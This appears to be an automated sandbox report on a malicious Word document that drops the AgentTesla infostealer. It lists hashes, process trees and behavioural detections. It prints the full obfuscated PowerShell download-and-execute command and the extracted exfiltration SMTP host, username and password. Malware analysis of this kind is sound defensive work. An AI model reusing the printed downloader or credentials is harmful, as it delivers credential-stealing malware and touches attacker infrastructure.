Analysis
-
max time kernel
139s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
11-03-2021 04:44
Static task
static1
Behavioral task
behavioral1
Sample
IMG_1035_80_63.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
IMG_1035_80_63.doc
Resource
win10v20201028
General
-
Target
IMG_1035_80_63.doc
-
Size
33KB
-
MD5
f1c7f28c1e71d97feabc188c267fd4a8
-
SHA1
bc323d3cb3234f98cfca8540ae9e7eb1ac29ab06
-
SHA256
b25e473d3fd1772bb3fcc4faec21fbdb5c1a5a2b2e3dcad5702d7466c8d7b9ce
-
SHA512
5ecc4583ad9904c808b52efdf9821c8e2b38df9e84af199b7265c3c95e5417b42030ebccbcd92de8774c46d466d97902a336c0da5de4aad5870034670fb49c52
Malware Config
Extracted
https://bit.ly/3ccVgSJ
Extracted
agenttesla
Protocol: smtp- Host:
sixjan.club - Port:
587 - Username:
[email protected] - Password:
{DsG_Z,9Yl50
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3564 580 powershell.exe WINWORD.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4028-26-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla behavioral2/memory/4028-27-0x000000000043762E-mapping.dmp family_agenttesla -
Beds Protector Packer 1 IoCs
Detects Beds Protector packer used to load .NET malware.
Processes:
resource yara_rule behavioral2/memory/764-21-0x0000000005470000-0x00000000054EC000-memory.dmp beds_protector -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 23 3564 powershell.exe 25 3564 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
pauele.exepauele.exepid process 764 pauele.exe 4028 pauele.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
pauele.exedescription pid process target process PID 764 set thread context of 4028 764 pauele.exe pauele.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 580 WINWORD.EXE 580 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepauele.exepid process 3564 powershell.exe 3564 powershell.exe 3564 powershell.exe 4028 pauele.exe 4028 pauele.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WINWORD.EXEpid process 580 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepauele.exedescription pid process Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 4028 pauele.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
WINWORD.EXEpid process 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE 580 WINWORD.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WINWORD.EXEpowershell.exepauele.exedescription pid process target process PID 580 wrote to memory of 3564 580 WINWORD.EXE powershell.exe PID 580 wrote to memory of 3564 580 WINWORD.EXE powershell.exe PID 3564 wrote to memory of 764 3564 powershell.exe pauele.exe PID 3564 wrote to memory of 764 3564 powershell.exe pauele.exe PID 3564 wrote to memory of 764 3564 powershell.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe PID 764 wrote to memory of 4028 764 pauele.exe pauele.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_1035_80_63.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" INvOkE-EXpRessiOn((('t9Qclien'+'t '+'= new'+'-'+'object S'+'ys'+'tem.Net.'+'WebClient'+';t9Qa'+' = AEi'+'https://bit.ly/3ccVgSJ'+'AEi.Spl'+'i'+'t'+'('+'AEi'+','+'AEi);t9Qhu'+'as = '+'t'+'9Q'+'env:temp'+' + AEi'+'c4g'+'pauele.exe'+'AEi;for'+'each'+'(t9'+'Q'+'b'+' in t9Qa)'+'{try{t9Qclie'+'nt'+'.DownloadFil'+'e(t9Qb.ToS'+'t'+'ring()'+','+' '+'t9Qhuas);I'+'nvoke-Item(t9Qhua'+'s);'+'b'+'reak;}catch{'+'write-hos'+'t t'+'9Q'+'_.Exce'+'ption.Me'+'ssa'+'ge'+'}};') -rePlacE't9Q',[ChAr]36 -crEPLacE'c4g',[ChAr]92 -crEPLacE'AEi',[ChAr]39) )2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pauele.exe"C:\Users\Admin\AppData\Local\Temp\pauele.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pauele.exe"C:\Users\Admin\AppData\Local\Temp\pauele.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\pauele.exeMD5
7442ea0814ae37240953a004cc6f74de
SHA1a055479cdb44b950f18980447993844f13a6ddf4
SHA256f44c6b4f6b79e047028d631ae551bc9dc1ef54b80d7943b2bb1044da53020a2a
SHA512e5e63bd3dc9c36c35f3aa55de58ddac79a9b446406fb2bb5aa68aa3c9822cd1ce1bdc3afab49bdbc53206c52b76efb4f7c3a4c0d94b24853ed45a869b5e3ed67
-
C:\Users\Admin\AppData\Local\Temp\pauele.exeMD5
7442ea0814ae37240953a004cc6f74de
SHA1a055479cdb44b950f18980447993844f13a6ddf4
SHA256f44c6b4f6b79e047028d631ae551bc9dc1ef54b80d7943b2bb1044da53020a2a
SHA512e5e63bd3dc9c36c35f3aa55de58ddac79a9b446406fb2bb5aa68aa3c9822cd1ce1bdc3afab49bdbc53206c52b76efb4f7c3a4c0d94b24853ed45a869b5e3ed67
-
C:\Users\Admin\AppData\Local\Temp\pauele.exeMD5
7442ea0814ae37240953a004cc6f74de
SHA1a055479cdb44b950f18980447993844f13a6ddf4
SHA256f44c6b4f6b79e047028d631ae551bc9dc1ef54b80d7943b2bb1044da53020a2a
SHA512e5e63bd3dc9c36c35f3aa55de58ddac79a9b446406fb2bb5aa68aa3c9822cd1ce1bdc3afab49bdbc53206c52b76efb4f7c3a4c0d94b24853ed45a869b5e3ed67
-
memory/580-2-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmpFilesize
64KB
-
memory/580-6-0x00007FFD5D8F0000-0x00007FFD5DF27000-memory.dmpFilesize
6.2MB
-
memory/580-7-0x00007FFD34E20000-0x00007FFD34E30000-memory.dmpFilesize
64KB
-
memory/580-3-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmpFilesize
64KB
-
memory/580-5-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmpFilesize
64KB
-
memory/580-4-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmpFilesize
64KB
-
memory/764-24-0x0000000005760000-0x0000000005761000-memory.dmpFilesize
4KB
-
memory/764-25-0x00000000055B0000-0x00000000055BF000-memory.dmpFilesize
60KB
-
memory/764-23-0x0000000005620000-0x0000000005621000-memory.dmpFilesize
4KB
-
memory/764-22-0x0000000005A20000-0x0000000005A21000-memory.dmpFilesize
4KB
-
memory/764-15-0x0000000000000000-mapping.dmp
-
memory/764-21-0x0000000005470000-0x00000000054EC000-memory.dmpFilesize
496KB
-
memory/764-33-0x00000000054F0000-0x00000000054F1000-memory.dmpFilesize
4KB
-
memory/764-18-0x0000000073F30000-0x000000007461E000-memory.dmpFilesize
6.9MB
-
memory/764-19-0x0000000000C50000-0x0000000000C51000-memory.dmpFilesize
4KB
-
memory/3564-10-0x000001F221B30000-0x000001F221B31000-memory.dmpFilesize
4KB
-
memory/3564-9-0x00007FFD50480000-0x00007FFD50E6C000-memory.dmpFilesize
9.9MB
-
memory/3564-13-0x000001F221B63000-0x000001F221B65000-memory.dmpFilesize
8KB
-
memory/3564-12-0x000001F221B60000-0x000001F221B62000-memory.dmpFilesize
8KB
-
memory/3564-11-0x000001F221DF0000-0x000001F221DF1000-memory.dmpFilesize
4KB
-
memory/3564-8-0x0000000000000000-mapping.dmp
-
memory/3564-14-0x000001F221B66000-0x000001F221B68000-memory.dmpFilesize
8KB
-
memory/4028-27-0x000000000043762E-mapping.dmp
-
memory/4028-29-0x0000000073F30000-0x000000007461E000-memory.dmpFilesize
6.9MB
-
memory/4028-26-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/4028-35-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/4028-36-0x0000000005450000-0x0000000005451000-memory.dmpFilesize
4KB
-
memory/4028-37-0x0000000005C00000-0x0000000005C01000-memory.dmpFilesize
4KB
-
memory/4028-39-0x0000000002920000-0x0000000002921000-memory.dmpFilesize
4KB